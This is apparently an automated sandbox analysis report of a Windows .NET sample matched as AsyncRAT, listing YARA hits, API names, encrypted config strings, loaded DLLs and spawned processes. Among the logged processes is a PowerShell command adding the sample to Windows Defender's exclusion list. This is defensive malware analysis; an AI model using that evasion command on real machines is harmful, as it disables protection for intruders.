                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_054327A05_2_054327A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_054327B05_2_054327B0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_054303CC5_2_054303CC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_0543AA715_2_0543AA71
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_054564085_2_05456408
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_05453C505_2_05453C50
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_05456CD85_2_05456CD8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_054581285_2_05458128
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_054560C05_2_054560C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 1128
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088989997.00000000035B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000000.2075574675.0000000000232000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefSgG.exe8 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2102027990.0000000006890000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088204496.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2102129900.0000000006B70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600180829.0000000005569000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeBinary or memory string: OriginalFilenamefSgG.exe8 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Settings.csBase64 encoded string: 'jnxDCgaTMcMwYhKdiA0/tKI8/Kg/cnn8GHJWZDKEh0okrDm+mNQ2A54NeeFeivwu', 'L0+anQz0xL4RJfOh6xkSyVpKsrstIjy+9VAEvWldBMgNh4coKLQIfFbJKAtiWawL', 'm6aTSUtqKTZEVViuXc98ZpgQUptgC/4Z08GdDnEjSZygd3cs9h6PtA8rplIslDg/'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Settings.csBase64 encoded string: 'jnxDCgaTMcMwYhKdiA0/tKI8/Kg/cnn8GHJWZDKEh0okrDm+mNQ2A54NeeFeivwu', 'L0+anQz0xL4RJfOh6xkSyVpKsrstIjy+9VAEvWldBMgNh4coKLQIfFbJKAtiWawL', 'm6aTSUtqKTZEVViuXc98ZpgQUptgC/4Z08GdDnEjSZygd3cs9h6PtA8rplIslDg/'
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, YqOlYl2eFwtfPkt21E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, YqOlYl2eFwtfPkt21E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, YqOlYl2eFwtfPkt21E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/11@2/2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.logJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6552
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeMutant created: \Sessions\1\BaseNamedObjects\lsODhik7XANOkJAK
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqvi3wjx.qt2.ps1Jump to behavior
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000000.2075574675.0000000000232000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO Product(Id, Name, Units, Price, CategoryId)VALUES (@id, @name, @units, @price, @idcat); SELECT last_insert_rowid()
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeReversingLabs: Detection: 44%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 1128
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeSection loaded: iphlpapi.dllJump to behavior
